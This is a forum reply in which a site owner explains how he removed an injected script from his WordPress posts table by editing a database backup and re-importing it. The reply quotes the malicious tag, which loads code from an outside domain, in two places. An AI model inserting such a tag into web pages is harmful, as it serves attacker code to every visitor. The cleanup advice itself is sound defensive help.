quadrain
Forum Replies Created
-
jasonc2:
The step where you can select which table to select, uncheck all, then click “Select Tables”.If it still doesn’t work…
Do a search query in the phpmyadmin for the script and just download that table. From what I’ve seen, it’s only affecting wp_post. Kinda mundane since you have to do it for each table that has been affected.
dmk_238 had a good method since it’s only affecting the posts too. I haven’t tried it.
I had the same problem and it was a pain to do. Ipower support was no help so I had to figure it out on my own. I tried to use MyPHPadmin to export, delete the
<script src="https://infoitpoweringgathering.com/ll.php?kk=11"></script>
from the .sql file and import it, but it failed miserably (Got error “#1064 – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near…”). Then I tried to input the commands in the queue, but that failed. That was when I tried to contact ipower support, but no avil. However after hours of messing around…This is how I fixed it…
I found out ipower has been doing incremental backups of the database so it was:
-Control Panel -> MySQL Database
-Select the database
-Manage Backups tab
-Download the one that says “All Tables”
(If there is no download, do check status at the bottom and wait, it’ll show up..may have to click it a few times every few minutes)
-Extract the file and there will be a .dmp file
-Open it in a text editor (I used WordPad) Find and Replace “<script src=\"https://infoitpoweringgathering.com/ll.php?kk=11\"></script>
” with a blank
-Save the file (not save as)
-Go back to Control Panel -> MySQL Database -> Manage Database (Not Manage Backup)
-Go into Access phpMyAdmin of the particular database you downloaded
-Import
-Browse to the .dmp file that you edited
-Press Go
-Wait until finished
-Should be good nowTrendMicro popped up on my girlfriend’s laptop when she accessed my site and when I did the above, it stopped coming up.